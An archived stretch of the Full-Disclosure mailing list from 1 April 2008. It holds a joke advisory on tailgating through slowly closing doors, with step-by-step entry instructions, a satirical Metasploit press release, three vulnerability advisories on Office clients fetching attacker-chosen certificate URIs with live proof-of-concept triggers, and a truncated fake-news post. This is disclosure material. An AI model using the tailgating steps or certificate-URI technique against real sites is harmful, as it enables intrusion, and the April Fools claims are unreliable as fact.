From druid at caughq.org  Tue Apr  1 06:00:22 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 00:00:22 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
Message-ID: <1207026022.3142.287.camel@localhost>

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                          Security Advisory 

===============/========================================================
Advisory ID:    CAU-2008-0001
Release Date:   04/01/2008
Title:          Slowly Closing Door Race Condition
Application/OS: Physical Structures
Topic:          Physical structures employing exit doors with locks
                are vulnerable to a race condition.
Vendor Status:  Not Notified
Attributes:     Physical, Race Condition
Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
Author/Email:   CAU <advisories (at) caughq.org>
===============/========================================================

Overview
========

Physical structures which employ automatically locking doors to secure 
exit points expose a race condition which may allow unauthorized entry.


Impact
======

Malicious outsiders may be able to enter a structure via an exit point.

Exit points may additionally provide an exit from a secure area of the
structure, allowing an outsider entering through the exit point to gain
direct access to the secure area.


Affected Systems
================

Physical structures which employ automatically locking doors at exit
points of the structure.


Technical Explanation
=====================

An exit's lock[1] generally converts a two-way door into a one-way
door, allowing a person to traverse the door's threshold in one
direction but not in the other.  These types of locks are used to
secure exit points of structures so that people may exit via the door
but not re-enter without disabling the lock through force or
authentication. 

When a person exits the structure through an exit point which is
secured by such a mechanism, a race condition exists wherein a
malicious outsider may be able to reach the door and enter through it
before it closes and locks itself.

Many doors, especially heavier ones, also employ closing mechanisms[2]
which are designed to cause the door to close slowly so as not to slam
the door shut and damage the door frame, or damage any human appendage
which may be in between the door and it's frame.  Such closing
mechanisms can greatly increase the amount of time that the race
condition exists.


Solution & Recommendations
==========================

1) Always ensure that personnel exiting an exit door wait outside the
   door until it has completely closed and locked before walking
   away.

2) Employ a double door system such as is used in an air-lock where
   the interior door must be secured prior to the exterior door being
   allowed to open.


Exploitation
============

First identify the exit point that you want to exploit.  Stand at a
safe distance during a high-traffic time and watch for people to use
the exit point.  Time how long it takes for the door to close and
lock itself when someone traverses the exit point.

Next, identify a safe hiding place near the exit point, preferably
in a direction that would be behind a person exiting the door, but
which is within a distance to the exit point which you could traverse
in under the door's closing time at a brisk pace or run.

Finally, hide in this location during a lower traffic time and wait
for someone to utilize the exit point.  After they have exited the
door and are walking away, run to the door and enter before it has
closed and locked.  Extra points are awarded for a spectacular dive
and/or roll to catch the door at the very last second.


References
==========

[1] http://en.wikipedia.org/wiki/Lock_%28device%29
[2] http://en.wikipedia.org/wiki/Door_closer


Credits & Gr33ts
================

Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214 


-- 
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/73434c07/attachment.bin 

From nate.mcfeters at gmail.com  Tue Apr  1 06:18:00 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Tue, 1 Apr 2008 00:18:00 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race
	Condition
In-Reply-To: <1207026022.3142.287.camel@localhost>
References: <1207026022.3142.287.camel@localhost>
Message-ID: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>

Hahaha, nice find.

On 4/1/08, I)ruid <druid at caughq.org> wrote:
>
>                      ____      ____     __    __
>                     /    \    /    \   |  |  |  |
>        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
>                   |  |      |  |__|  | |  |  |  |
>                   |  |  ___ |   __   | |  |  |  |
> ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
>                     \____/  |__|  |__|  \______/
>
>                    Computer Academic Underground
>                        http://www.caughq.org
>                          Security Advisory
>
> ===============/========================================================
> Advisory ID:    CAU-2008-0001
> Release Date:   04/01/2008
> Title:          Slowly Closing Door Race Condition
> Application/OS: Physical Structures
> Topic:          Physical structures employing exit doors with locks
>                are vulnerable to a race condition.
> Vendor Status:  Not Notified
> Attributes:     Physical, Race Condition
> Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
> Author/Email:   CAU <advisories (at) caughq.org>
> ===============/========================================================
>
> Overview
> ========
>
> Physical structures which employ automatically locking doors to secure
> exit points expose a race condition which may allow unauthorized entry.
>
>
> Impact
> ======
>
> Malicious outsiders may be able to enter a structure via an exit point.
>
> Exit points may additionally provide an exit from a secure area of the
> structure, allowing an outsider entering through the exit point to gain
> direct access to the secure area.
>
>
> Affected Systems
> ================
>
> Physical structures which employ automatically locking doors at exit
> points of the structure.
>
>
> Technical Explanation
> =====================
>
> An exit's lock[1] generally converts a two-way door into a one-way
> door, allowing a person to traverse the door's threshold in one
> direction but not in the other.  These types of locks are used to
> secure exit points of structures so that people may exit via the door
> but not re-enter without disabling the lock through force or
> authentication.
>
> When a person exits the structure through an exit point which is
> secured by such a mechanism, a race condition exists wherein a
> malicious outsider may be able to reach the door and enter through it
> before it closes and locks itself.
>
> Many doors, especially heavier ones, also employ closing mechanisms[2]
> which are designed to cause the door to close slowly so as not to slam
> the door shut and damage the door frame, or damage any human appendage
> which may be in between the door and it's frame.  Such closing
> mechanisms can greatly increase the amount of time that the race
> condition exists.
>
>
> Solution & Recommendations
> ==========================
>
> 1) Always ensure that personnel exiting an exit door wait outside the
>   door until it has completely closed and locked before walking
>   away.
>
> 2) Employ a double door system such as is used in an air-lock where
>   the interior door must be secured prior to the exterior door being
>   allowed to open.
>
>
> Exploitation
> ============
>
> First identify the exit point that you want to exploit.  Stand at a
> safe distance during a high-traffic time and watch for people to use
> the exit point.  Time how long it takes for the door to close and
> lock itself when someone traverses the exit point.
>
> Next, identify a safe hiding place near the exit point, preferably
> in a direction that would be behind a person exiting the door, but
> which is within a distance to the exit point which you could traverse
> in under the door's closing time at a brisk pace or run.
>
> Finally, hide in this location during a lower traffic time and wait
> for someone to utilize the exit point.  After they have exited the
> door and are walking away, run to the door and enter before it has
> closed and locked.  Extra points are awarded for a spectacular dive
> and/or roll to catch the door at the very last second.
>
>
> References
> ==========
>
> [1] http://en.wikipedia.org/wiki/Lock_%28device%29
> [2] http://en.wikipedia.org/wiki/Door_closer
>
>
> Credits & Gr33ts
> ================
>
> Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214
>
>
> --
> I)ruid, C?ISSP
> druid at caughq.org
> http://druid.caughq.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/6a2773b9/attachment.html 

From fdlist at digitaloffense.net  Tue Apr  1 06:49:23 2008
From: fdlist at digitaloffense.net (METASPLOIT CORPORATION)
Date: Tue, 1 Apr 2008 00:49:23 -0500
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <200804010049.23823.fdlist@digitaloffense.net>



            FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)

    METASPLOIT CORPORATION ANNOUNCES VERSION 4.0 
OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
       AND A CLOSED SOURCE LICENSE AGREEMENT.  

After over a year and a half in stealth-mode, Metasploit Corporation has announced
the 4.0 release of their flag-ship product, The Metasploit Framework.  The new
release comes jam-packed with exciting features that are sure to please even
the German legal system.  The following brief list includes some of the more
fantastic changes.

PWNCRAFT!

Tired of fighting the good fight with the tried and true user interfaces you've
come to expect from exploitation frameworks?  Seeing a command shell for the
5000th time got you down?  Well, you're in luck.  Metasploit has decided to
return to its rootz in '08 and focus on the exploitation-as-a-game model.
PwnCraft brings the worlds of ownage and pwnage together for the first time in
a revolutionary Real Time Strategy (RTS) world.  Don't be fooled by the
game-like interface, though!  The actions you take in PwnCraft have a real
effect on the world around you!  Here's just a taste of some of the absolutely
insane features you can look forward to:

  - Glide through enemy networks with a squadron of elegant winged pwnies
  - Launch devastating attacks against enemy ports in an all-out IPS-evading
    TCP/IP assault
  - Use the fuzzy Burrowing Badger unit to discover 0day flaws in enemy
    defenses
  - Conqueer cities and installing agents who can sabotage and smuggle other
    units to new Vistas
  - An entirely in-game interface to the vulnerability sharing market to
    improve your arsenal on the fly!
  - AND MORE!

Beta testing of PwnCraft is currently underway and we are hoping to begin
releasing it in stores at a retail price of $49.99 in Q3 2009.  More details
about the game can be found on the Metasploit website:

http://metasploit.com/


CLOSED SOURCE LICENSE

After years of struggling to define Metasploit's licensing position a final
decision has been made to "screw it" and move the framework to a closed source
license agreement.  The decision was made to sell out for a number of reasons,
not the least of which has to do with the benjamins.  Metasploit 2.x and 3.x
will no longer be available for public download.

SPLOIT AT ME

Get the latest exploits from Metasploit's patent-pending Sploit At Me service
that delivers exploits on demand.  You can rest assured that Metasploit's
Sploit At Me service will attempt to compromise machines of your choosing with
*99% reliability.

About Metasploit Corporation

Metasploit Corporation is an industry leader with thousands of non-paying
customers world-wide.  Metasploit delivers high-quality, top-notch,
success-driven exploits to the security world as one-stop-shop exploitation
framework.


  * The other 1% of the time, your own machine will be compromised.


From a.klink at cynops.de  Tue Apr  1 10:05:53 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:05:53 +0200
Subject: [Full-disclosure] HTTP over X.509 - Microsoft Outlook
Message-ID: <47F1FAF1.8020804@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-002 |||
============================================

HTTP over X.509 (S/MIME) - Microsoft Outlook
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-002.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-002-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-002-outlook-smime.txt

Vendor: Microsoft
Product: Outlook
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: Outlook 2007 (12.0.4518.1014)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509 certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Outlook attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - a "reading confirmation", which is often undesired by the
recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try
to get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even if the
S/MIME signature itself is invalid - this means than a clever spammer
would not even have to burn CPU cycles on creating correct signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC:
    Contacted secure at microsoft.com with information, advisory
    draft (in an S/MIME-encrypted mail) and an example mail.

11.01.2008, 18:30 and 18:49 UTC:
    The example mail triggers HTTP requests from 131.107.0.[104|75]
    with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".

11.01.2008, 21:54 UTC:
    Nate from Microsoft replies with case number (7897) and case manager
    (Geoff). The original mail is fullquoted in this unencrypted reply -
    why did I bother to install their certificate again?

14.01.2008, 17:33 UTC:
    The example mail triggers more HTTP requests from 131.107.0.103,
    this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".

31.01.2008/01.02.2008:
    The example mail regularly triggers HTTP requests from 207.46.55.29,
    with user agents of
      "Microsoft-CryptoAPI/5.131.2600.2180"
      "Microsoft-CryptoAPI/5.131.2600.3285",
      "Microsoft-CryptoAPI/5.131.2600.3297",
      "Microsoft-CryptoAPI/5.131.3790.1830",
      "Microsoft-CryptoAPI/5.131.3790.3959" and
      "Microsoft-CryptoAPI/6.0",

01.02.2008, 00:14 UTC:
    Geoff replies to let me know they are working on it (yes, I can see
    that :-). Dave and a few additional teams are assisting with the
    investigation of the issue, no requests for additional information,
    they will stay in contact within the next few weeks to provide me
    with an update. The original report is again sent along unencrypted
    and fullquoted.
   
February/March 2008:
    The occasional Microsoft HTTP request appears in the webserver logfiles

18.03.2008:
    Requested update on the issue, informed them that Office 2007 is
    vulnerable to the same problem as well (as are signed executables,
    but the signature is not checked automatically) and IPSec does not
    seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Outlook's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp S?dmeyer for the help in trying out the first attacks


-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/9e0c93b0/attachment.bin 

From a.klink at cynops.de  Tue Apr  1 10:06:03 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:03 +0200
Subject: [Full-disclosure] HTTP over X.509 - Windows Live Mail
Message-ID: <47F1FAFB.106@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-003 |||
============================================

HTTP over X.509 (S/MIME) - Windows Live Mail
============================================

Date released: 01.04.2008
Date reported: 11.01.2008
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-003.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-003-signed.txt)
   https://www.klink.name/security/aklink-sa-2008-003-live-mail-smime.txt

Vendor: Microsoft
Product: Windows Live Mail
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 2008 (Build 12.0.1606)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

S/MIME (Secure / Multipurpose Internet Mail Extensions) is a standard
for public key encryption and signing of e-mail based on X.509 certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s). For details see RFC 3851/3850.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When receiving an S/MIME-signed email, Windows Live Mail attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - a "reading confirmation", which is often undesired by the
recipient as well (for example if the sender is a spammer).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the e-mail is opened in the preview pane.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

In yet undetermined intervals, it also seems to occasionally try
to get the CA issuer certificates again, leading to more HTTP requests.

Also to be noted is that the certificate validation takes place even if the
S/MIME signature itself is invalid - this means than a clever spammer
would not even have to burn CPU cycles on creating correct signatures.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

To receive such an S/MIME-signed email that triggers a HTTP request
and to verify that this request reaches an outside server, send a
blank email to smime-http at klink.name.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

11.01.2008, 17:20 UTC:
    Contacted secure at microsoft.com with information, advisory
    draft (in an S/MIME-encrypted mail) and an example mail.

11.01.2008, 18:30 and 18:49 UTC:
    The example mail triggers HTTP requests from 131.107.0.[104|75]
    with a user agent of "Microsoft-CryptoAPI/5.131.3790.3959".

11.01.2008, 21:54 UTC:
    Nate from Microsoft replies with case number (7897) and case manager
    (Geoff). The original mail is fullquoted in this unencrypted reply -
    why did I bother to install their certificate again?

14.01.2008, 17:33 UTC:
    The example mail triggers more HTTP requests from 131.107.0.103,
    this time with a user agent of "Microsoft-CryptoAPI/5.131.2600.2180".

31.01.2008/01.02.2008:
    The example mail regularly triggers HTTP requests from 207.46.55.29,
    with user agents of
      "Microsoft-CryptoAPI/5.131.2600.2180"
      "Microsoft-CryptoAPI/5.131.2600.3285",
      "Microsoft-CryptoAPI/5.131.2600.3297",
      "Microsoft-CryptoAPI/5.131.3790.1830",
      "Microsoft-CryptoAPI/5.131.3790.3959" and
      "Microsoft-CryptoAPI/6.0",

01.02.2008, 00:14 UTC:
    Geoff replies to let me know they are working on it (yes, I can see
    that :-). Dave and a few additional teams are assisting with the
    investigation of the issue, no requests for additional information,
    they will stay in contact within the next few weeks to provide me
    with an update. The original report is again sent along unencrypted
    and fullquoted.
   
February/March 2008:
    The occasional Microsoft HTTP request appears in the webserver logfiles

18.03.2008:
    Requested update on the issue, informed them that Office 2007 is
    vulnerable to the same problem as well (as are signed executables,
    but the signature is not checked automatically) and IPSec does not
    seem to be vulnerable.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Live Mail's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Thanks to:

- Philipp S?dmeyer for the help in trying out the first attacks using 
Outlook

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/e33dbbdc/attachment-0001.bin 

From a.klink at cynops.de  Tue Apr  1 10:06:13 2008
From: a.klink at cynops.de (Alexander Klink)
Date: Tue, 01 Apr 2008 11:06:13 +0200
Subject: [Full-disclosure] HTTP over X.509 - Office 2007
Message-ID: <47F1FB05.2030107@cynops.de>

============================================
||| Security Advisory AKLINK-SA-2008-004 |||
============================================

HTTP over X.509 - Microsoft Office 2007
=======================================

Date released: 01.04.2008
Date reported: 18.03.2008 (a similar issue was reported on 11.01.2008)
$Revision: 1.1 $

by Alexander Klink
   Cynops GmbH
   a.klink at cynops.de
   https://www.cynops.de/advisories/AKLINK-SA-2008-004.txt
   (S/MIME signed: 
https://www.cynops.de/advisories/AKLINK-SA-2008-004-signed.txt)
   
https://www.klink.name/security/aklink-sa-2008-004-office2007-signatures.txt

Vendor: Microsoft
Product: Office 2007
Type of vulnerability: design problem
Class: remote
Status: unpatched
Severity: moderate
Releases known to be affected: 12.0.6212.1000 SP1 MSO (12.0.6213.1000)
Releases known NOT to be affected: none

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Background:

Microsoft Office 2007 allows a user to sign documents using X.509
certificates.
X.509 certificates allow a number of extension which specify URIs for
additional information regarding the certificate - for example a location
where to download the issuer certificate(s).

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Overview:

When opening a document with a digital signature, Office 2007 attempts to
use the additional URIs contained in the certificate to download
information relevant for the verification of the certificate. It
will automatically send out HTTP requests to any location that
is reachable from the client - which might include networks previously
unreachable to an attacker.

Results are unnoticed access to both external or internal webservers,
which in turn could be attacked using other vectors and - in the simplest
case - an "opening confirmation", which is often undesired by the
recipient as well (as it can be used to track who opened which document
at what time).

For an overview of this class of attacks, see the ?HTTP over X.509?
whitepaper at https://www.cynops.de/techzone/http_over_x509.html.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Technical details:

For an introduction to the technical details, please see the whitepaper.
In this particular case, Microsoft Crypto API handles the
authorityInfoAccess caIssuers extension. The HTTP requests are sent
out as soon as the document is opened.

The Microsoft Crypto API accepts up to five CA Issuer URIs in the
given certificate which may be up to 8 kibibit each (so there is
enough space for a potential attack payload). Contrary to the RFC,
it only accepts HTTP URIs. The Crypto API connects to arbitrary
TCP ports (both privileged and unprivileged) specified in the HTTP
URI.

In one test, the attempt to connect to a running machine
(more or less regardless whether the particular requested port is
open or not) took about 3 seconds and attempting to connect to
an unreachable machine took about 10-16 seconds. If this could
be confirmed to be always the case (some preliminary tests indicated
otherwise), this would allow one to scan for internal hosts via mail
(at the great speed of two hosts per opened mail - it is not as fast as
PortBunny, granted).

Contrary to the vulnerabilities in Microsoft Outlook and Windows Live
Mail, the certificate is only verified if the signature is intact.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Proof of Concept:

A signed Word 2007 document that triggers an HTTP request is available at
http://www.klink.name/security/HTTP_over_Office_2007_PoC.docx
The document contains a link which shows the last 10 HTTP requests
triggered by this document. By verifying whether you are on the
list, you can verify if you are affected by this vulnerability.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Communication:

18.03.2008:
    As part of a communication on a similar issue in Outlook and
    Windows Live Mail, informed them that Office 2007 is vulnerable
    as well. For details on the earlier communication, see
    AKLINK-SA-2008-002 or AKLINK-SA-2008-003.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Solution:

None so far.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Workarounds:

- limit Office's ability to do HTTP requests, for example by setting an
  invalid proxy in the internet options. If possible, filter outgoing
  HTTP requests with a user-agent matching "Microsoft-CryptoAPI/*"

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Why this advisory has no CVE ID:

Normally, I make sure every advisory I release has a CVE ID to ensure that
the issue can be identified without doubt. In the past, I have been
assigned CVE IDs directly and promptly by Steve Christey of MITRE.
The communication in this case went like this:

17.01.2008: contacted Steve Christey with the question on how to handle
            CVEs for a generic issue in an RFC that is vulnerable in
            a specific implementation.
01.02.2008: contact Steve again to ask for an update
01.02.2008: Steve replies saying that he must have missed the first
            email and says:
 | This can be a tough one for CVE, but if it's a fundamental design problem
 | in a single RFC, and *any* conformant implementation will have the issue,
 | then it gets a single CVE.
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no longer the
            correct contact

 >From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to me
very much either. I like the CVE idea and would like to use CVE IDs
whenever possible, but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Credits:

- Alexander Klink, Cynops GmbH (discovery)

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Gesch?ftsf?hrer:
     Bad Homburg v. d. H?he |                      |      Martin Bartosch


-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c8ce5963/attachment-0001.bin 

From tecklord at securitylab.ru  Tue Apr  1 10:38:40 2008
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Tue, 1 Apr 2008 12:38:40 +0300
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
References: <AB202291-2AD3-4AD3-AA36-D4217FFB2114@yahoo.com.ar>
Message-ID: <627CE286524A4000B3318FDCF5074725@gw1>

BBC reports: Secretary-General Ban Ki-moon made an official statement 
supporting Windows Vista and Windows Server 2008.

"I believe a bug in OS Linux has allowed hackers to access Pentagon network 
and steal classified national security information and place blame on China"", 
